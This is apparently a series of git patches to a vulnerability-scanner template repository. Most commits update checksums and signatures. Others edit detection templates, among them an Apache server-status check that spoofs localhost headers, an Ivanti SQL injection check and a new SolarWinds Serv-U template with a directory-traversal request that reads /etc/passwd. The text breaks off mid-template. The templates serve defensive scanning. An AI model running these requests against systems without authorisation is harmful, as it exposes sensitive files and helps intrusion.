http/exposures/files/sass-lint.yaml:08c9927bf6ceef823413d6996074d9e83295c7ba http/exposures/files/secret-token-rb.yaml:f504f7560705207dc75f7e3921a7c903c0b39a0a http/exposures/files/secrets-file.yaml:8939750a85103d1021bc0fbe40240a5ebb053e2d -http/exposures/files/sendgrid-env.yaml:bf8735793679ef535ff15c4887ae5c7f7e558419 +http/exposures/files/sendgrid-env.yaml:035a27103979546626b5955aac89f3226e4b95b1 http/exposures/files/sensitive-storage-exposure.yaml:e3b66315f9107f0ed2d27faab772309a600b345e http/exposures/files/service-account-credentials.yaml:513b67ee72fc5e1b6422688222442d14b1885eb5 http/exposures/files/shellscripts.yaml:835c1037da9bff93cd85ba8980aa75c5abaa5949 @@ -8645,7 +8644,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:7f048c15f9ba729b8a067a87a3e2a347ea24261c +templates-checksum.txt:45c5f3033032197aad557ed9c67cee71cc51f2fd wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From ccead79d3e69f8254282a3d5c16305bd576af5da Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 12 Jun 2024 17:22:07 +0000 Subject: [PATCH 0177/1841] Auto Generated Templates Checksum [Wed Jun 12 17:22:07 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index fdbc20bfc5..f4656e5387 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -7577,7 +7577,7 @@ http/vulnerabilities/backdoor/kevinlab-bems-backdoor.yaml:40fe980d103f1d5051cba7 http/vulnerabilities/backdoor/kevinlab-hems-backdoor.yaml:dbdc2b6a43a93f2c3fa9693bcebc4603d9259cf7 http/vulnerabilities/backdoor/maccmsv10-backdoor.yaml:e763381e735041df29338e57c20d2f6c1f90cec3 http/vulnerabilities/backdoor/php-zerodium-backdoor-rce.yaml:afb4e7906517f78be25199884095f7d6eff8ac70 -http/vulnerabilities/bsphp-info.yaml:62655793c49f73f68f11e0ec94e376a19190fa66 +http/vulnerabilities/bsphp-info.yaml:0d559d686ce729e60e001dd61d68c0dd8818a22f http/vulnerabilities/chanjet-tplus/chanjet-tplus-rce.yaml:47bcfad01469360b596efc0ee445ea1da8b7ae9e http/vulnerabilities/chanjet-tplus/chanjet-tplus-unauth-passreset.yaml:76ea49402465f15c655f2e5c13c29f6eb50e8849 http/vulnerabilities/cisco/cisco-broadworks-log4j-rce.yaml:aa7007ba1ce5c82e237ebc46f035db262b9d6266 @@ -8644,7 +8644,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:45c5f3033032197aad557ed9c67cee71cc51f2fd +templates-checksum.txt:f7c3c0d260f4333b1f45440cf4a17355f8e4157f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 1fb20f26765f070b594e9e79d3bb19fd8beff741 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 12 Jun 2024 17:23:57 +0000 Subject: [PATCH 0179/1841] Auto Template Signing [Wed Jun 12 17:23:57 UTC 2024] :robot: --- http/vulnerabilities/bsphp-info.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/vulnerabilities/bsphp-info.yaml b/http/vulnerabilities/bsphp-info.yaml index 49d566a89e..6041e0c6ba 100644 --- a/http/vulnerabilities/bsphp-info.yaml +++ b/http/vulnerabilities/bsphp-info.yaml @@ -37,5 +37,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220033c5256d9f095151dcc179c9e313d7a1a7d6990a474993090e051058fed29980221008ab4209bba10c0fcf2b914bb58c0fae56f45e3b5330d5e9fc9d620485c4dba7d:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220652faa7e1bd008edefb25d6e1cae33738436dfbd246a89837aa135da98d159a90220156ca327bbb5643f27fb67f3e634ee42d882017efe550d46e3e70ebc93c1cefb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From f5052fe8448c07f2551c5a442e6d944890e38119 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 12 Jun 2024 22:55:22 +0530 Subject: [PATCH 0180/1841] added flow & updated matcher --- .../apache-server-status-localhost.yaml | 27 ++++++++++++------- 1 file changed, 18 insertions(+), 9 deletions(-) diff --git a/http/misconfiguration/apache/apache-server-status-localhost.yaml b/http/misconfiguration/apache/apache-server-status-localhost.yaml index 5b26072d0e..0f188f89e8 100644 --- a/http/misconfiguration/apache/apache-server-status-localhost.yaml +++ b/http/misconfiguration/apache/apache-server-status-localhost.yaml @@ -1,25 +1,35 @@ ---- id: apache-server-status-localhost + info: name: Server Status Disclosure author: pdteam,geeknik,NaN-kl severity: low - description: Apache Server Status page is exposed, which may contain information - about pages visited by the users, their IPs or sensitive information such as - session tokens. + description: | + Apache Server Status page is exposed, which may contain information about pages visited by the users, their IPs or sensitive information such as session tokens. metadata: max-request: 2 tags: apache,debug,misconfig + +flow: http(1) && http(2) + http: - method: GET path: - "{{BaseURL}}/server-status" + matchers: - type: status status: - 403 - 404 + - 401 + condition: or + internal: true + - method: GET + path: + - "{{BaseURL}}/server-status" + headers: Forwarded: 127.0.0.1 X-Client-IP: 127.0.0.1 @@ -32,11 +42,10 @@ http: X-Remote-Addr: 127.0.0.1 X-Remote-IP: 127.0.0.1 X-True-IP: 127.0.0.1 - path: - - "{{BaseURL}}/server-status" + matchers: - type: word words: - - Apache Server Status - - Server Version - condition: and \ No newline at end of file + - "Apache Server Status" + - "Server Version" + condition: and From 7a0cdac0452f750814d7576d912c9f9f819108d1 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 12 Jun 2024 23:06:40 +0530 Subject: [PATCH 0181/1841] minor update --- http/cves/2024/CVE-2024-29824.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/http/cves/2024/CVE-2024-29824.yaml b/http/cves/2024/CVE-2024-29824.yaml index 65836e797d..a21c2ec7b5 100644 --- a/http/cves/2024/CVE-2024-29824.yaml +++ b/http/cves/2024/CVE-2024-29824.yaml @@ -39,6 +39,11 @@ http: words: - 'application/soap+xml' + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + - type: status status: - 200 From e47383b052221026da8c84558132d76052d7068a Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 13 Jun 2024 11:50:19 +0530 Subject: [PATCH 0182/1841] minor - update --- network/detection/mikrotik-ssh-detect.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/network/detection/mikrotik-ssh-detect.yaml b/network/detection/mikrotik-ssh-detect.yaml index 71c5c9c687..95fdbd5dbb 100644 --- a/network/detection/mikrotik-ssh-detect.yaml +++ b/network/detection/mikrotik-ssh-detect.yaml @@ -6,7 +6,6 @@ info: severity: info description: | MikroTik RouterOS SSH was detected. - reference: - http://www.openwall.com/lists/oss-security/2016/08/01/2 - http://www.openwall.com/lists/oss-security/2018/08/15/5 @@ -18,6 +17,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 + shodan-query: SSH-2.0-ROSSSH tags: network,mikrotik,detect,detection,tcp tcp: @@ -28,5 +28,4 @@ tcp: matchers: - type: regex regex: - - '(?i)SSH-2.0-ROSSSH' -# digest: 4b0a00483046022100a2f739b5d172666666e2087baacfe59d3df55a3ee81fa0ebfecda07f2ae2a920022100eb49ed7935e0ce621e1b7082cfbf8ac5d759866cd38f9443cb79f2899a5192d4:5ee180a688096af8a060049f233bbfa9 + - '(?i)SSH-2.0-ROSSSH' \ No newline at end of file From 98e1b905b0e71ddc1b507ca28ce19ae28af218f4 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 13 Jun 2024 11:59:27 +0530 Subject: [PATCH 0183/1841] Update netgear-boarddataww-rce.yaml --- http/iot/netgear-boarddataww-rce.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/iot/netgear-boarddataww-rce.yaml b/http/iot/netgear-boarddataww-rce.yaml index 3f2653e3e0..713a6c3bc7 100644 --- a/http/iot/netgear-boarddataww-rce.yaml +++ b/http/iot/netgear-boarddataww-rce.yaml @@ -1,7 +1,7 @@ id: netgear-boarddataww-rce info: - name: Netgear Devices boardDataWW.php Unauthenticated Remote Command Execution + name: Netgear Devices boardDataWW.php - Remote Command Execution author: pussycat0x severity: critical description: | @@ -13,7 +13,7 @@ info: verified: true max-request: 1 fofa-query: title=="Netgear" - tags: rce,netgear,iot + tags: rce,netgear,iot,unauth http: - raw: @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202be68da7d697188443c2d892977d00cd770b4ce2744300d6610960302379934702204f43f499309a8009fb3e465c1d271aaeb24428f8ed6beb7b24982bb2b5da3bc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202be68da7d697188443c2d892977d00cd770b4ce2744300d6610960302379934702204f43f499309a8009fb3e465c1d271aaeb24428f8ed6beb7b24982bb2b5da3bc7:922c64590222798bb761d5b6d8e72950 From 3359b957c547a4fc3f71936ae7f45d283c8cbf02 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 13 Jun 2024 08:10:02 +0000 Subject: [PATCH 0185/1841] Auto Generated Templates Checksum [Thu Jun 13 08:10:02 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index f4656e5387..b543989898 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5176,7 +5176,7 @@ http/iot/kyocera-printer-panel.yaml:e5565f4141df411b26e2b935e5777feebf6e07da http/iot/liveview-axis-camera.yaml:27770208bc0e8e6cb58a52f715f04451005ed271 http/iot/loytec-device.yaml:a9386283d6c5614c0f8af85d05651d2d98c89183 http/iot/mobotix-guest-camera.yaml:c01218a024c67546ad7ba633208ce64a985fb032 -http/iot/netgear-boarddataww-rce.yaml:5cd04abbaffeeff88eaaade0259e6fa95c857f9a +http/iot/netgear-boarddataww-rce.yaml:1d785e1ac8b84e14f1b28fbd6bf17df0489f58c0 http/iot/netsurveillance-web.yaml:bc37216eb766b14eb44c7450623e6b0be900a35e http/iot/network-camera-detect.yaml:75f24121124cf3a8e5aca711ec2f29d1d857fa39 http/iot/novus-ip-camera.yaml:f14cfb5cff0f616b430dd4fffcc09f8d725c78db @@ -7577,7 +7577,7 @@ http/vulnerabilities/backdoor/kevinlab-bems-backdoor.yaml:40fe980d103f1d5051cba7 http/vulnerabilities/backdoor/kevinlab-hems-backdoor.yaml:dbdc2b6a43a93f2c3fa9693bcebc4603d9259cf7 http/vulnerabilities/backdoor/maccmsv10-backdoor.yaml:e763381e735041df29338e57c20d2f6c1f90cec3 http/vulnerabilities/backdoor/php-zerodium-backdoor-rce.yaml:afb4e7906517f78be25199884095f7d6eff8ac70 -http/vulnerabilities/bsphp-info.yaml:0d559d686ce729e60e001dd61d68c0dd8818a22f +http/vulnerabilities/bsphp-info.yaml:46e581c10e555d13d42b306e5ba11288df471949 http/vulnerabilities/chanjet-tplus/chanjet-tplus-rce.yaml:47bcfad01469360b596efc0ee445ea1da8b7ae9e http/vulnerabilities/chanjet-tplus/chanjet-tplus-unauth-passreset.yaml:76ea49402465f15c655f2e5c13c29f6eb50e8849 http/vulnerabilities/cisco/cisco-broadworks-log4j-rce.yaml:aa7007ba1ce5c82e237ebc46f035db262b9d6266 @@ -8644,7 +8644,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:f7c3c0d260f4333b1f45440cf4a17355f8e4157f +templates-checksum.txt:568c3f60e8cadb6c6db437e1f0cf5b32042f1515 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 0e076fc2656c83487fcc60f9a9212bbaac6e487b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 13 Jun 2024 13:40:06 +0530 Subject: [PATCH 0186/1841] add verified --- network/detection/mikrotik-ssh-detect.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/network/detection/mikrotik-ssh-detect.yaml b/network/detection/mikrotik-ssh-detect.yaml index 95fdbd5dbb..987c1028cf 100644 --- a/network/detection/mikrotik-ssh-detect.yaml +++ b/network/detection/mikrotik-ssh-detect.yaml @@ -18,6 +18,7 @@ info: metadata: max-request: 1 shodan-query: SSH-2.0-ROSSSH + verified: true tags: network,mikrotik,detect,detection,tcp tcp: @@ -28,4 +29,4 @@ tcp: matchers: - type: regex regex: - - '(?i)SSH-2.0-ROSSSH' \ No newline at end of file + - '(?i)SSH-2.0-ROSSSH' From 58978cd89dbfb0418976f7c2c4e43c19ecc21d30 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 13 Jun 2024 08:11:39 +0000 Subject: [PATCH 0187/1841] Auto Template Signing [Thu Jun 13 08:11:39 UTC 2024] :robot: --- http/iot/netgear-boarddataww-rce.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/iot/netgear-boarddataww-rce.yaml b/http/iot/netgear-boarddataww-rce.yaml index 713a6c3bc7..d3fdea07d3 100644 --- a/http/iot/netgear-boarddataww-rce.yaml +++ b/http/iot/netgear-boarddataww-rce.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202be68da7d697188443c2d892977d00cd770b4ce2744300d6610960302379934702204f43f499309a8009fb3e465c1d271aaeb24428f8ed6beb7b24982bb2b5da3bc7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f155a94a54503da5deb6ff296b834f282eaf04979d15a1cdb961e8ca5dfc40eb022046f9caa3ae3c3b946928cb46d3324b557eca2d4b174bc6ac0cb2606547ada161:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 5cf0fe249a458445eada75c7bf482a459f23131b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 13 Jun 2024 13:44:21 +0530 Subject: [PATCH 0188/1841] add classification & update severity --- http/cves/2024/CVE-2024-29824.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-29824.yaml b/http/cves/2024/CVE-2024-29824.yaml index a21c2ec7b5..54bbdb14e8 100644 --- a/http/cves/2024/CVE-2024-29824.yaml +++ b/http/cves/2024/CVE-2024-29824.yaml @@ -3,13 +3,19 @@ id: CVE-2024-29824 info: name: Ivanti EPM SQL Remote Code Execution via SQL Injection author: DhiyaneshDK - severity: high + severity: critical description: | An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to execute arbitrary code. reference: - https://github.com/horizon3ai/CVE-2024-29824 + - https://nvd.nist.gov/vuln/detail/CVE-2024-29824 + - https://forums.ivanti.com/s/article/Security-Advisory-May-2024 - https://www.horizon3.ai/attack-research/attack-blogs/cve-2024-29824-deep-dive-ivanti-epm-sql-injection-remote-code-execution-vulnerability/ - tags: cve,cve2024,ivanti,epm,sqli,rc + classification: + cvss-metrics: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.6 + cve-id: CVE-2024-29824 + tags: cve,cve2024,ivanti,epm,sqli,rce http: - raw: From 54aa8097419756d705ee0830c5e816b5fbd91b90 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 13 Jun 2024 08:15:22 +0000 Subject: [PATCH 0189/1841] Auto Generated New Template Addition List [Thu Jun 13 08:15:21 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index fe3b6dda30..a0e80a4b81 100644 --- a/.new-additions +++ b/.new-additions @@ -12,3 +12,4 @@ http/exposed-panels/oracle-application-server-panel.yaml http/exposed-panels/veeam-backup-manager-login.yaml http/exposed-panels/wildix-collaboration-panel.yaml http/technologies/nperf-server-detect.yaml +network/detection/mikrotik-ssh-detect.yaml From 7bfe37d1d071bf3a19bb43cd37369f06c4d9ea28 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 13 Jun 2024 08:15:27 +0000 Subject: [PATCH 0190/1841] Auto Generated Templates Checksum [Thu Jun 13 08:15:27 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b543989898..d26002b048 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5176,7 +5176,7 @@ http/iot/kyocera-printer-panel.yaml:e5565f4141df411b26e2b935e5777feebf6e07da http/iot/liveview-axis-camera.yaml:27770208bc0e8e6cb58a52f715f04451005ed271 http/iot/loytec-device.yaml:a9386283d6c5614c0f8af85d05651d2d98c89183 http/iot/mobotix-guest-camera.yaml:c01218a024c67546ad7ba633208ce64a985fb032 -http/iot/netgear-boarddataww-rce.yaml:1d785e1ac8b84e14f1b28fbd6bf17df0489f58c0 +http/iot/netgear-boarddataww-rce.yaml:65fbd098f7d78a05bd23e0875c0e43e2d9599071 http/iot/netsurveillance-web.yaml:bc37216eb766b14eb44c7450623e6b0be900a35e http/iot/network-camera-detect.yaml:75f24121124cf3a8e5aca711ec2f29d1d857fa39 http/iot/novus-ip-camera.yaml:f14cfb5cff0f616b430dd4fffcc09f8d725c78db @@ -8516,6 +8516,7 @@ network/detection/java-rmi-detect.yaml:202bcdc6fc13b2561933d98e8cf75f5e917d7022 network/detection/microsoft-ftp-service.yaml:5fc5a60ea61d8ff29b095a40b56f87abf66a9156 network/detection/mikrotik-ftp-server-detect.yaml:7d148ba7b6af4f9fb78d22ce3ee05f5491cdf0ad network/detection/mikrotik-routeros-api.yaml:6e99f2d3e5df1ac249846d83206f9eeb2732bbd3 +network/detection/mikrotik-ssh-detect.yaml:d7534e41b5b44a31dd978c98655d003f5e00e266 network/detection/mongodb-detect.yaml:35a026591de560092a2bd5d74f0a3eb50e9fda80 network/detection/moveit-sftp-detect.yaml:234b9d11a7f66f35140c7c083b613a31f3a58dea network/detection/msmq-detect.yaml:ba00026ecd1bd7b2a4faa69d374d4711603bd6b0 @@ -8644,7 +8645,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:568c3f60e8cadb6c6db437e1f0cf5b32042f1515 +templates-checksum.txt:06f0ceb07d5ae280275e6d58ba814479cf6faed6 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 745fff5cd5288df9a4da9056b53fe8529f5f7693 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 13 Jun 2024 08:16:14 +0000 Subject: [PATCH 0191/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 6c4d4882a8..6b6e4904ad 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -17,6 +17,7 @@ on: - 'http/exposed-panels/veeam-backup-manager-login.yaml' - 'http/exposed-panels/wildix-collaboration-panel.yaml' - 'http/technologies/nperf-server-detect.yaml' + - 'network/detection/mikrotik-ssh-detect.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 51693bd70c93927dd8a3383563cfdf21ea11c959 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 13 Jun 2024 08:16:26 +0000 Subject: [PATCH 0192/1841] Auto Generated New Template Addition List [Thu Jun 13 08:16:26 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index a0e80a4b81..fb8f57525c 100644 --- a/.new-additions +++ b/.new-additions @@ -11,5 +11,6 @@ http/exposed-panels/lorex-panel.yaml http/exposed-panels/oracle-application-server-panel.yaml http/exposed-panels/veeam-backup-manager-login.yaml http/exposed-panels/wildix-collaboration-panel.yaml +http/misconfiguration/apache/apache-server-status-localhost.yaml http/technologies/nperf-server-detect.yaml network/detection/mikrotik-ssh-detect.yaml From 2caaa2e652659513d863dd71c7c3412ba4aec4ed Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 13 Jun 2024 08:16:38 +0000 Subject: [PATCH 0193/1841] Auto Generated Templates Checksum [Thu Jun 13 08:16:38 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index d26002b048..5f5bff4e48 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5287,6 +5287,7 @@ http/misconfiguration/apache/apache-couchdb-unauth.yaml:f1a42febc03d40ab2eb27519 http/misconfiguration/apache/apache-filename-enum.yaml:00fec57e8abf4422bb9223a4f1ce706b023f0eef http/misconfiguration/apache/apache-hbase-unauth.yaml:73f22979593c54310c2145d482018010663fe9a2 http/misconfiguration/apache/apache-nifi-unauth.yaml:4e19b0b31aea4665b8ca4fa4c2aa6380182ce120 +http/misconfiguration/apache/apache-server-status-localhost.yaml:66cb8088785ba5ec211abc13b82eeef13a4a1213 http/misconfiguration/apache/apache-server-status.yaml:1afd6683f4ff99098d2c8a81ea650f1be4a81926 http/misconfiguration/apache/apache-storm-unauth.yaml:a4e0f588e65474220083ff0960511fc324b4f139 http/misconfiguration/apache/apache-zeppelin-unauth.yaml:18859a2711b1796228e38d53e2588c4a211e33d4 @@ -5714,7 +5715,6 @@ http/misconfiguration/secnet-info-leak.yaml:5f2028c717a06972b7c79f8651397eed3cbd http/misconfiguration/seeyon-unauth.yaml:327e4ce46015f481855c8a2f2f6d26b80a2f9109 http/misconfiguration/selenium-exposure.yaml:1fb605206740b5a7ec01d6ba7468b4339d8f34e9 http/misconfiguration/sentinel-license-monitor.yaml:123e83ea787470cc96323f371c0f43ec4db9ec22 -http/misconfiguration/server-status-localhost.yaml:920d65e7e9cd3d8b02094cc32aa4291a3f36df40 http/misconfiguration/server-status.yaml:0fbfb6c7b6e541aade005e601c0a5d83acdfe202 http/misconfiguration/service-pwd.yaml:625117d7929ae17d0cf02bb5b4e9fefee1ca36b9 http/misconfiguration/servicenow-widget-misconfig.yaml:7946ba306bf6bdea013874dd95b68cab9c106c7b @@ -8645,7 +8645,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:06f0ceb07d5ae280275e6d58ba814479cf6faed6 +templates-checksum.txt:279c7b38610f8eec9580bf2fe6360756da75e268 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 628ac8e54d5dbdf8008a05c45d5d1418ef50685a Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 13 Jun 2024 08:17:19 +0000 Subject: [PATCH 0194/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 6b6e4904ad..d70a8d262c 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -16,6 +16,7 @@ on: - 'http/exposed-panels/oracle-application-server-panel.yaml' - 'http/exposed-panels/veeam-backup-manager-login.yaml' - 'http/exposed-panels/wildix-collaboration-panel.yaml' + - 'http/misconfiguration/apache/apache-server-status-localhost.yaml' - 'http/technologies/nperf-server-detect.yaml' - 'network/detection/mikrotik-ssh-detect.yaml' workflow_dispatch: From c9ac4473ae25aef037aaf277d3cb325984299f57 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 13 Jun 2024 08:17:35 +0000 Subject: [PATCH 0195/1841] Auto Template Signing [Thu Jun 13 08:17:35 UTC 2024] :robot: --- network/detection/mikrotik-ssh-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/network/detection/mikrotik-ssh-detect.yaml b/network/detection/mikrotik-ssh-detect.yaml index 987c1028cf..b32432d606 100644 --- a/network/detection/mikrotik-ssh-detect.yaml +++ b/network/detection/mikrotik-ssh-detect.yaml @@ -30,3 +30,4 @@ tcp: - type: regex regex: - '(?i)SSH-2.0-ROSSSH' +# digest: 4a0a004730450221008f52920084494a1cfc3c1943f25325bab5a79022bd7b2bec0be68ed5e84ba113022012407324f7cd175b4e76e48623193790bd1e4b90e59b1db0148e01e11febef10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 2736211273c8ec83f0e276dfa715e39f337a98e6 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 13 Jun 2024 13:54:39 +0530 Subject: [PATCH 0196/1841] minor update --- http/cves/2024/CVE-2024-37393.yaml | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-37393.yaml b/http/cves/2024/CVE-2024-37393.yaml index 7017e64ef1..89a460c535 100644 --- a/http/cves/2024/CVE-2024-37393.yaml +++ b/http/cves/2024/CVE-2024-37393.yaml @@ -1,7 +1,7 @@ id: CVE-2024-37393 info: - name: SecurEnvoy MFA LDAP Injection - author: securityforeveryone.com + name: SecurEnvoy Two Factor Authentication - LDAP Injection + author: securityforeveryone severity: critical description: | Multiple LDAP injections vulnerabilities exist in SecurEnvoy MFA before 9.4.514 due to improper validation of user-supplied input. An unauthenticated remote attacker could exfiltrate data from Active Directory through blind LDAP injection attacks against the DESKTOP service exposed on the /secserver HTTP endpoint. This may include ms-Mcs-AdmPwd, which has a cleartext password for the Local Administrator Password Solution (LAPS) feature. @@ -9,7 +9,12 @@ info: - https://www.tenable.com/cve/CVE-2024-37393 - https://www.optistream.io/blogs/tech/securenvoy-cve-2024-37393 - https://securenvoy.com - tags: cve,cve2024,SecurEnvoy,ldap + metadata: + verified: true + shodan-query: title:"SecurEnvoy" + fofa-query: title="SecurEnvoy" + tags: cve,cve2024,securenvoy,ldap + variables: userid: "{{to_lower(rand_base(20))}}" From df8760977497cfe393b5ee13b039a478706a96e3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 13 Jun 2024 15:32:51 +0530 Subject: [PATCH 0197/1841] Create CVE-2024-28995.yaml --- http/cves/2024/CVE-2024-28995.yaml | 38 ++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 http/cves/2024/CVE-2024-28995.yaml diff --git a/http/cves/2024/CVE-2024-28995.yaml b/http/cves/2024/CVE-2024-28995.yaml new file mode 100644 index 0000000000..8bde715f67 --- /dev/null +++ b/http/cves/2024/CVE-2024-28995.yaml @@ -0,0 +1,38 @@ +id: CVE-2024-28995 + + +info: + name: SolarWinds Serv-U - Directory Traversal + author: DhiyaneshDK + severity: high + description: | + SolarWinds Serv-U was susceptible to a directory transversal vulnerability that would allow access to read sensitive files on the host machine. + reference: + - https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis + - https://nvd.nist.gov/vuln/detail/CVE-2024-28995 + - https://x.com/stephenfewer/status/1801191416741130575 + metadata: + shodan-query: + verified: true + tags: cve,cve2024,lfi,solarwinds,serv-u + +http: + - method: GET + path: + - '{{BaseURL}}/?InternalDir=\..\..\..\..\etc^&InternalFile=passwd' + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 